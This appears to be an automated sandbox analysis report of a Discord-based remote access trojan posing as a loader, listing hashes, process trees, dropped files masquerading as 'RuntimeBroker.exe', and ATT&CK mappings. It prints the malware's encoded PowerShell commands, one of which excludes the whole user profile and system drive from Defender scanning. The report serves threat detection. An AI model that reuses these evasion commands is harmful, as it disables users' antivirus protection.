discordrat | cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623

General

Target

JungLoaderFixed.exe
Size

21.3MB
MD5

7aa4185295ab3f4f896704aed05c0795
SHA1

3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256

cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
SHA512

997ffd6fae8e72b7ca5c62f7de9a9a2c487580b0fec589d305c485163ff873539baa20c5791c3626403cf824a02ebf458c24e28236eae45a75461d1ba88a9e45
SSDEEP

393216:jVymy1SvjN1GnU7s1/aRUFWYbyemyzgnfpyyxlj3OMddmZceVUJA9OhBI1Hs7:Em+SvZs+sldbzgRhFldmZceX9OP7

Score

10^/10

discordrat defense_evasion persistence pyinstaller rat rootkit stealer upx

Malware Config

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 3 IoCs

pid	Process
2660	RuntimeBroker.exe
2612	RuntimeBroker2.0.exe
1740	RuntimeBroker.exe

Loads dropped DLL 11 IoCs

pid	Process
2200	JungLoaderFixed.exe
2200	JungLoaderFixed.exe
2660	RuntimeBroker.exe
1740	RuntimeBroker.exe
2920	WerFault.exe
2920	WerFault.exe
2920	WerFault.exe
2920	WerFault.exe
2920	WerFault.exe
1204	Process not Found
1204	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016dda-42.dat	upx
behavioral1/memory/1740-44-0x000007FEE91C0000-0x000007FEE9626000-memory.dmp	upx

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001c000000005591-21.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2760	powershell.exe
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2200 wrote to memory of 2760	2200	JungLoaderFixed.exe	30
PID 2200 wrote to memory of 2760	2200	JungLoaderFixed.exe	30
PID 2200 wrote to memory of 2760	2200	JungLoaderFixed.exe	30
PID 2200 wrote to memory of 2656	2200	JungLoaderFixed.exe	32
PID 2200 wrote to memory of 2656	2200	JungLoaderFixed.exe	32
PID 2200 wrote to memory of 2656	2200	JungLoaderFixed.exe	32
PID 2200 wrote to memory of 2660	2200	JungLoaderFixed.exe	34
PID 2200 wrote to memory of 2660	2200	JungLoaderFixed.exe	34
PID 2200 wrote to memory of 2660	2200	JungLoaderFixed.exe	34
PID 2200 wrote to memory of 2612	2200	JungLoaderFixed.exe	35
PID 2200 wrote to memory of 2612	2200	JungLoaderFixed.exe	35
PID 2200 wrote to memory of 2612	2200	JungLoaderFixed.exe	35
PID 2660 wrote to memory of 1740	2660	RuntimeBroker.exe	36
PID 2660 wrote to memory of 1740	2660	RuntimeBroker.exe	36
PID 2660 wrote to memory of 1740	2660	RuntimeBroker.exe	36
PID 2612 wrote to memory of 2920	2612	RuntimeBroker2.0.exe	37
PID 2612 wrote to memory of 2920	2612	RuntimeBroker2.0.exe	37
PID 2612 wrote to memory of 2920	2612	RuntimeBroker2.0.exe	37

C:\Users\Admin\AppData\Local\Temp\JungLoaderFixed.exe
"C:\Users\Admin\AppData\Local\Temp\JungLoaderFixed.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1740
- C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2612 -s 600
    3⤵
    - Loads dropped DLL
    PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI26602\python310.dll

Filesize
1.4MB

MD5
4a6afa2200b1918c413d511c5a3c041c

SHA1
39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3

SHA256
bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da

SHA512
dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L23LU9PTACQSIGR39VPH.temp

Filesize
7KB

MD5
db7afd7dc90a3062c9daf4939d4894ab

SHA1
8a26bdc847f62c6984a653ad70f7a5ed6ae5e925

SHA256
fae4dbd894d44526b6f046dea07a0c04b99352dc5ab34529e6d87fc5788a5d8d

SHA512
1fc82dd9750d2cad121808227f4d24237909c17bb71430e3837d79f87a03e8d56667a3d62d1569bec9073a576c6f9d59016d60829c293808a897976406217b3b

Download Submit
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

Filesize
21.2MB

MD5
a83964f260c28614da067f6b3df9e044

SHA1
157304b579228e7d41e6218eac935339854bb431

SHA256
f5d2b5a19575e7b3041b846263316f66f80c2804f9e0f2376e1576612d27cca8

SHA512
dd4e8fa7fb45f091fd875eb347bb594ef7d890921255e2ba985e4f96a938b4997ce81f51a5951f3633d93c38e336e8fb4dc7eeec6545203076865ec6b0e232e1

Download Submit
C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe

Filesize
79KB

MD5
95af6e5d52a57515dc2e638c419f50d9

SHA1
d359abc0ebb9877c917e125fb4e28c24b27696a4

SHA256
0fe67abfd1a323e19a065a54d544f0997f5853f7a51a3526c10c1a15bf5b5749

SHA512
cfb2d075d75af7f965e961eccbf3f188e64a5b594e556a9bf8569f2c2380065fb2781e4e4689d87b7af65066cac217e59cf0a7d32f43f2bd61938aa06791b50b

Download Submit
memory/1740-44-0x000007FEE91C0000-0x000007FEE9626000-memory.dmp

Filesize
4.4MB

Download
memory/2200-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp

Filesize
4KB

Download
memory/2200-1-0x0000000000D60000-0x00000000022AE000-memory.dmp

Filesize
21.3MB

Download
memory/2200-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2200-27-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2612-26-0x000000013FB20000-0x000000013FB38000-memory.dmp

Filesize
96KB

Download
memory/2760-8-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2760-13-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing